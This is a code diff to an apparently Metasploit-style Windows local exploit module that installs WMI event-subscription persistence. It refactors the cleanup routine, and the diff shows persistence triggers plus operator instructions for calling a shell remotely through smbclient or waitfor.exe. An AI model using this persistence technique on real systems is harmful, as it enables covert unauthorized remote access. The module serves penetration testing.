updated cleanup method to remove_persistence to prevent creating rc file even if module fails

Author: NickTyrer

modules/exploits/windows/local/wmi_persistence.rb

@@ -95,24 +95,24 @@ def exploit
     when 'LOGON'
       psh_exec(subscription_logon)
       print_good "Persistence installed!"
-      @cleanup
+      remove_persistence
     when 'INTERVAL'
       psh_exec(subscription_interval)
       print_good "Persistence installed!"
-      @cleanup
+      remove_persistence
     when 'EVENT'
       psh_exec(subscription_event)
       print_good "Persistence installed! Call a shell using \"smbclient \\\\\\\\<target_ip>\\\\C$ -U "+datastore['USERNAME_TRIGGER']+" <arbitrary password>\""
-      @cleanup
+      remove_persistence
     when 'PROCESS'
       psh_exec(subscription_process)
       print_good "Persistence installed!"
-      @cleanup
+      remove_persistence
     when 'WAITFOR'
       psh_exec(subscription_waitfor)
-      cmd_exec("waitfor.exe #{datastore['WAITFOR_TRIGGER']}, time_out = 0")
+      cmd_exec("waitfor.exe", args = " #{datastore['WAITFOR_TRIGGER']}")
       print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
-      @cleanup
+      remove_persistence
     end
    end
 
@@ -193,44 +193,34 @@ def subscription_waitfor
   end
 
 
-  def log_file(log_path = nil) # Thanks Meatballs for this
+  def log_file
     host = session.session_host
     filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-    if log_path
-      logs = ::File.join(log_path, 'logs', 'wmi_persistence',
-      Rex::FileUtils.clean_path(host + filenameinfo))
-    else
-      logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
-      Rex::FileUtils.clean_path(host + filenameinfo))
-    end
+    logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',
+    Rex::FileUtils.clean_path(host + filenameinfo))
     ::FileUtils.mkdir_p(logs)
     logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')
-    logfile
   end
 
 
-  def cleanup
-    if datastore['PERSISTENCE_METHOD'] == "WAITFOR"
-      name_class = datastore['CLASSNAME']
-      clean_rc = log_file()
-      clean_up_rc = ""
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
-      file_local_write(clean_rc, clean_up_rc)
-      print_status("Clean up Meterpreter RC file: #{clean_rc}")
-    else
-      name_class = datastore['CLASSNAME']
-      clean_rc = log_file()
-      clean_up_rc = ""
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
-      clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
-      file_local_write(clean_rc, clean_up_rc)
-      print_status("Clean up Meterpreter RC file: #{clean_rc}")
-    end
+  def remove_persistence
+    name_class = datastore['CLASSNAME']
+    clean_rc = log_file
+      if datastore['PERSISTENCE_METHOD'] == "WAITFOR"
+        clean_up_rc = ""
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+      else
+        clean_up_rc = ""
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+        clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+      end
+    file_local_write(clean_rc, clean_up_rc)
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
   end
 end